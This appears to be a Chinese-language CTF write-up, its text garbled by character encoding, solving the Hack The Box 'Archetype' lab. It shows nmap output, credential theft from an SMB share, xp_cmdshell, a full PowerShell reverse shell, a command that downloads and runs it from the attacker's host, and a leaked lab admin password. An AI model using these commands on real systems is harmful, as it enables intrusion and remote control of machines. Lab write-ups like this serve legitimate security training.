I"Ç*<h2 id="å‰è¨€">å‰è¨€</h2>

<p>å¿ƒè¡€æ¥æ½®æƒ³è¯•è¯•ä¸€äº›å›½å¤–çš„CTFç½‘ç«™è¯•è¯•ï¼Œç„¶åæƒ³èµ·æ¥HTBä¸€ç›´éƒ½æ²¡æœ‰å¼€å§‹ï¼Œäºæ˜¯åœ¨Bç«™çœ‹äº†ä¸€ä¸‹è§†é¢‘æ‰“ç®—ä¸Šæ‰‹ç©ä¸€ä¸‹ã€‚</p>

<h2 id="å‡†å¤‡">å‡†å¤‡</h2>

<p>è´¦å·çš„è·å–ä¸ç”¨å¤šè¯´ï¼Œç½‘ä¸Šæ•™ç¨‹æœ‰ä¸€å¤§å †ï¼Œæˆ‘è¿™é‡Œç®€å•è®²ä¸€ä¸‹openvpnï¼Œè¿™ä¸ªä¸œè¥¿æ˜¯åœ¨linuxå‘½ä»¤è¡Œé‡Œé¢ç›´æ¥è·‘çš„ï¼Œåœ¨HTBè·å–<code class="language-plaintext highlighter-rouge">example.ovpn</code>çš„packä¹‹åï¼Œç›´æ¥:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>openvpn &lt;example.ovpn&gt; 
</code></pre></div></div>

<p>æœ€åæ£€æŸ¥ä¸€ä¸‹èƒ½ä¸èƒ½pingé€šé‚£ä¸ªIP</p>

<p>è‡ªå·±çš„IPä¹Ÿä¼šå˜ï¼Œä¼šè¢«åˆ†é…ä¸€ä¸ªè™šæ‹Ÿç½‘å¡</p>

<p><img src="..\images\Snipaste_2021-02-01_11-53-48.jpg" alt="Snipaste_2021-02-01_11-53-48" /></p>

<h2 id="ä¿¡æ¯æ”¶é›†">ä¿¡æ¯æ”¶é›†</h2>

<p>æˆ‘åšçš„è¿™ä¸ªæ˜¯HTBçš„æ–°æ‰‹æ•™ç¨‹é¶æœºï¼Œæ¯ä¸€æ­¥éƒ½æœ‰tutorialï¼Œå› æ­¤åªè¦è·Ÿç€æ­¥éª¤æ¥å°±å¯ä»¥äº†</p>

<p>é¦–å…ˆæ˜¯nmapæ‰«æIPçš„ç«¯å£</p>

<p>è¿™é‡Œç”¨åˆ°çš„å‘½ä»¤æ˜¯</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-sS</span> <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-T4</span> <span class="nt">-vv</span> &lt;æŒ‡å®šIP&gt;
</code></pre></div></div>

<p>ç”¨è¿™ä¸ªå¯ä»¥æ¢æµ‹åˆ°ç«¯å£çš„æœåŠ¡</p>

<p>æœ€åæŠŠå¾—åˆ°çš„ä¿¡æ¯æ”¶é›†èµ·æ¥</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>opened ports:
445
135
139
1433
Host script results:
|_clock-skew: mean: 2h56m05s, deviation: 3h34m41s, median: 1h20m05s
| ms-sql-info: 
|   10.10.10.27:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 53066/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 42521/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 45578/udp): CLEAN (Failed to receive data)
|   Check 4 (port 48474/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-01-31T19:06:00-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-02-01T03:06:03
|_  start_date: N/A
</code></pre></div></div>

<h2 id="æ¼æ´æ¢æµ‹">æ¼æ´æ¢æµ‹</h2>

<p>ç”±äº445(SQL Server)å’Œ1433(SMB)ç«¯å£è¢«æ‰“å¼€ï¼Œé‚£ä¹ˆé¦–å…ˆä»è¿™ä¸¤ä¸ªç«¯å£å…¥æ‰‹</p>

<p><img src="..\images\Snipaste_2021-02-01_12-00-12.jpg" alt="Snipaste_2021-02-01_12-00-12" /></p>

<h2 id="æ¼æ´åˆ©ç”¨">æ¼æ´åˆ©ç”¨</h2>

<p>å¯ä»¥è¿æ¥backupsï¼Œè¿›å»ä¹‹åç”¨getä¸‹è½½é‡Œé¢çš„æ–‡ä»¶</p>

<p><img src="..\images\Snipaste_2021-02-01_12-01-53.jpg" alt="Snipaste_2021-02-01_12-01-53" /></p>

<p>å¯ä»¥å¾—åˆ°SQL Serverçš„è´¦å·å¯†ç </p>

<p>ä½¿ç”¨impactetå·¥å…·é›†è®¿é—®SQL Server</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python3 mssqlclient.py ARCHETYPE/sql_svc@&lt;IP&gt; <span class="nt">-windows-auth</span>
</code></pre></div></div>

<p>ä¹‹åè¾“å…¥å¯†ç  è¿æ¥ä¸ŠSQL Serverï¼Œä¾æ¬¡æ‰§è¡Œå¦‚ä¸‹å‘½ä»¤</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> EXEC sp_configure <span class="s1">'Show Advanced Options'</span>, 1<span class="p">;</span> 
 reconfigure<span class="p">;</span> 
 sp_configure<span class="p">;</span> 
 EXEC sp_configure <span class="s1">'xp_cmdshell'</span>, 1 
 reconfigure<span class="p">;</span> 
 xp_cmdshell <span class="s2">"whoami"</span> 
</code></pre></div></div>

<p>å¯ä»¥å‘ç°å·²ç»æ‹¿åˆ°äº†ä¸€ä¸ªç®€å•çš„å‘½ä»¤æ‰§è¡Œ</p>

<p>è¯•ç€åå¼¹shell</p>

<p>åˆ›å»ºshell.ps1</p>

<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="w"> </span><span class="nv">$client</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">New-Object</span><span class="w"> </span><span class="nx">System.Net.Sockets.TCPClient</span><span class="p">(</span><span class="s2">"&lt;ä½ çš„IP&gt;"</span><span class="p">,</span><span class="mi">443</span><span class="p">);</span><span class="nv">$stream</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$client</span><span class="o">.</span><span class="nf">GetStream</span><span class="p">();[</span><span class="n">byte</span><span class="p">[]]</span><span class="nv">$bytes</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="o">..</span><span class="mi">65535</span><span class="o">|%</span><span class="p">{</span><span class="mi">0</span><span class="p">};</span><span class="kr">while</span><span class="p">((</span><span class="nv">$i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$stream</span><span class="o">.</span><span class="nf">Read</span><span class="p">(</span><span class="nv">$bytes</span><span class="p">,</span><span class="w"> </span><span class="nx">0</span><span class="p">,</span><span class="w"> </span><span class="nv">$bytes</span><span class="o">.</span><span class="nf">Length</span><span class="p">))</span><span class="w"> </span><span class="o">-ne</span><span class="w"> </span><span class="mi">0</span><span class="p">){;</span><span class="nv">$data</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">New-Object</span><span class="w"> </span><span class="nt">-TypeName</span><span class="w"> </span><span class="nx">System.Text.ASCIIEncoding</span><span class="p">)</span><span class="o">.</span><span class="nf">GetString</span><span class="p">(</span><span class="nv">$bytes</span><span class="p">,</span><span class="nx">0</span><span class="p">,</span><span class="w"> </span><span class="nv">$i</span><span class="p">);</span><span class="nv">$sendback</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">iex</span><span class="w"> </span><span class="nv">$data</span><span class="w"> </span><span class="nx">2</span><span class="err">&gt;</span><span class="o">&amp;</span><span class="nx">1</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Out-String</span><span class="w"> </span><span class="p">);</span><span class="nv">$sendback2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$sendback</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s2">"# "</span><span class="p">;</span><span class="nv">$sendbyte</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">([</span><span class="n">text.encoding</span><span class="p">]::</span><span class="n">ASCII</span><span class="p">)</span><span class="o">.</span><span class="nf">GetBytes</span><span class="p">(</span><span class="nv">$sendback2</span><span class="p">);</span><span class="nv">$stream</span><span class="o">.</span><span class="nf">Write</span><span class="p">(</span><span class="nv">$sendbyte</span><span class="p">,</span><span class="nx">0</span><span class="p">,</span><span class="nv">$sendbyte</span><span class="o">.</span><span class="nf">Length</span><span class="p">);</span><span class="nv">$stream</span><span class="o">.</span><span class="nf">Flush</span><span class="p">()};</span><span class="nv">$client</span><span class="o">.</span><span class="nf">Close</span><span class="p">()</span><span class="w"> 
</span></code></pre></div></div>

<p>ç„¶åæ‰“å¼€è‡ªå·±çš„æœåŠ¡å™¨</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> python3 <span class="nt">-m</span> http.server 80 
</code></pre></div></div>

<p>æ‰“å¼€nc å¼€å¯443ç«¯å£ç›‘å¬</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> nc <span class="nt">-lvnp</span> 443
</code></pre></div></div>

<p>ä¿®æ”¹å…¥ç½‘è§„åˆ™</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ufw allow from 10.10.10.27 proto tcp to any port 80,443 
</code></pre></div></div>

<p>åœ¨SQL Serverä¸­æ‰§è¡Œåå¼¹shellå‘½ä»¤</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xp_cmdshell <span class="s2">"powershell "</span>IEX <span class="o">(</span>New-Object Net.WebClient<span class="o">)</span>.DownloadString<span class="o">(</span><span class="se">\"</span>http://&lt;ä½ çš„IP&gt;/shell.ps1<span class="se">\"</span><span class="o">)</span><span class="p">;</span><span class="s2">" 
</span></code></pre></div></div>

<p><img src="..\images\Snipaste_2021-02-01_12-35-24.jpg" alt="Snipaste_2021-02-01_12-35-24" /></p>

<p>æˆåŠŸåå¼¹å›æ¥ï¼Œè¿™é‡Œå¯ä»¥æ‹¿åˆ°userçš„flag</p>

<p><img src="..\images\Snipaste_2021-02-01_12-36-36.jpg" alt="Snipaste_2021-02-01_12-36-36" /></p>

<p>ä½¿ç”¨ä¸‹é¢çš„å‘½ä»¤è®¿é—®PowerShellå†å²è®°å½•æ–‡ä»¶ã€‚</p>

<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kr">type</span><span class="w"> </span><span class="n">C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt</span><span class="w"> 
</span></code></pre></div></div>

<p>å¾—åˆ°ç®¡ç†å‘˜å¯†ç </p>

<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">net.exe</span><span class="w"> </span><span class="nx">use</span><span class="w"> </span><span class="nx">T:</span><span class="w"> </span><span class="nx">\\Archetype\backups</span><span class="w"> </span><span class="nx">/user:administrator</span><span class="w"> </span><span class="nx">MEGACORP_4dm1n</span><span class="o">!!</span><span class="w">
</span><span class="kr">exit</span><span class="w">
</span></code></pre></div></div>

<p>ä½¿ç”¨impacketçš„psexec.pyæ‹¿åˆ°winçš„ç®¡ç†å‘˜æƒé™shell</p>

<p>è¿™é‡Œæœ‰ä¸ªå‘ï¼Œç›´æ¥æ‰§è¡Œexampleä¸‹é¢çš„æ–‡ä»¶ä¼šæç¤ºç¼ºå°‘åŒ…ï¼Œéœ€è¦æŠŠåŒ…å¤åˆ¶ä¸€ä»½å¯¼å…¥åˆ°exampleä¸­æ‰è¡Œ</p>

<p><img src="..\\images\Snipaste_2021-02-01_12-42-06.jpg" alt="Snipaste_2021-02-01_12-42-06" /></p>

<p>æœ€ååœ¨Desktopå¤„æ‹¿ä¸‹rootçš„flag</p>

<p>ç»“æŸï¼</p>
:ET